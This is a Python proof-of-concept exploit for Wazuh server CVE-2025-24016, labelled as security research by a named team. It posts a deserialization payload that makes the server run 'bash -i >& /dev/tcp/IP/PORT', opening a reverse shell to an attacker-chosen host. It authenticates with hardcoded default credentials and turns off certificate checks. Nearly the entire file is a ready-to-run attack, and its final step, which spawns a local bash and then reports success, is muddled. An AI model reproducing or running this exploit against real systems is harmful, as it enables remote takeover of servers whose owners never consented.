import argparse import logging import requests from requests.auth import HTTPBasicAuth import pyfiglet import os import time import ipaddress from packaging import version import sys import urllib3 logging.basicConfig( level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s' ) logger = logging.getLogger(__name__) def color_print(text, color=None): if color == 'error': return f"\033[1;31m{text}\033[0m" elif color == 'warning': return f"\033[1;33m{text}\033[0m" elif color == 'success': return f"\033[1;32m{text}\033[0m" elif color == 'info': return f"\033[1;36m{text}\033[0m" else: return text def version_check(): try: req_version = version.parse(requests.__version__) pyfiglet_version = version.parse(pyfiglet.__version__) logger.info( "Wazuh Current version:\n" f"Requests: {req_version}\n" f"PyFiglet: {pyfiglet_version}\n" ) except Exception as e: logger.error("Pengecekan versi gagal karena %s", str(e)) def parse_args(): parser = argparse.ArgumentParser( description="Wazuh RCE Exploit POC", formatter_class=argparse.ArgumentDefaultsHelpFormatter ) # Required required = parser.add_argument_group("Required") required.add_argument( "-u", "--url", required=True, help="URL target (ex: https://:55000/security/user/authenticate/run_as)" ) required.add_argument( "-i", "--ip", required=True, help="LHOST for reverse shell connection" ) required.add_argument( "-p", "--port", required=True, type=int, help="LPORT for reverse shell connection" ) # Auth auth = parser.add_argument_group("Opsi Auth") auth.add_argument( "-user", "--username", default="wazuh-wui", help="Username for auth" ) auth.add_argument( "-pass", "--password", default="MyS3cr37P450r.*-", help="Password for auth" ) # Opsi tambahan optional = parser.add_argument_group("Opsi Tambahan") optional.add_argument( "-c", "--config-file", type=str, help="Path to configuration file" ) optional.add_argument( "-n", "--no-color", action="store_true", help="Nonaktifkan output warna" ) optional.add_argument( "--version", action="version", version="1.0", help="Show program version" ) return parser.parse_args() def check_ip(ip): try: ipaddress.ip_address(ip) return True except ValueError: logger.error("IP tidak valid: %s", ip) return False def check_port(port): try: port_int = int(port) if 0 < port_int <= 65535: return True logger.error("Invalid Port: %s", port) return False except ValueError: logger.error("Port tidak merupakan angka: %s", port) return False def check_url(url): if not url.startswith("http"): logger.error("Invalid URL, make sure the URL starts with http:// atau https://") return False return True def main(): args = parse_args() def local_color_print(text, color=None): if args.no_color: return text return color_print(text, color) if not check_ip(args.ip) or not check_port(args.port) or not check_url(args.url): logger.error("Invalid IP/Port/URL") sys.exit(1) version_check() ascii_motd = pyfiglet.figlet_format("Wazuh RCE") custom_header = ( "\n" + "---------------------------------------------------\n" " Custom Wazuh RCE Header\n" "---------------------------------------------------\n" ) print(ascii_motd) if args.config_file: print(custom_header) else: print("Wazuh Server RCE - CVE-2025-24016") print("Research & Testing Purposes Only!") print("Unauthorized use is strictly prohibited.") print("By: Jessie at Pelindo Cyber Security Team") print("Credits: Aiman, Cahyo, Ihsan & the Arch \n") # Payload payload = { "__unhandled_exc__": { "__class__": "os.system", "__args__": [ f"bash -i >& /dev/tcp/{args.ip}/{args.port} 0>&1" ] } } headers = { "Content-Type": "application/json", "X-Header-Name": "Custom-Header" } # Auth username = args.username password = args.password urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) try: response = requests.post( args.url, json=payload, headers=headers, auth=HTTPBasicAuth(username, password), verify=False, timeout=10 ) if response.status_code != 200: logger.error("Kode status respons: %d", response.status_code) if "Unauthorized" in str(response.text): logger.error("Failed Authentication") else: logger.error("Respons abnormal: %s", response.text) sys.exit(1) print(color_print("Sucess Authentication!", "success")) print("Respons:", color_print(response.text, "info")) except requests.exceptions.RequestException as e: error_type = type(e).__name__ logger.error("%s: %s", error_type, str(e)) sys.exit(1) # Opsi shell reverse_shell_options = { "command": "bash -i", "reverse_port": args.port, "timeout": 5, "retry_count": 3 } logger.info("Established connection reverse shell to %s:%d", args.ip, int(args.port)) time.sleep(reverse_shell_options["timeout"]) try: s = os.system(reverse_shell_options["command"]) if s != 0: logger.error("Reverse shell failed: %s", str(s)) finally: if 's' in locals(): del s print(color_print("Reverse shell success!", "success")) if __name__ == "__main__": main()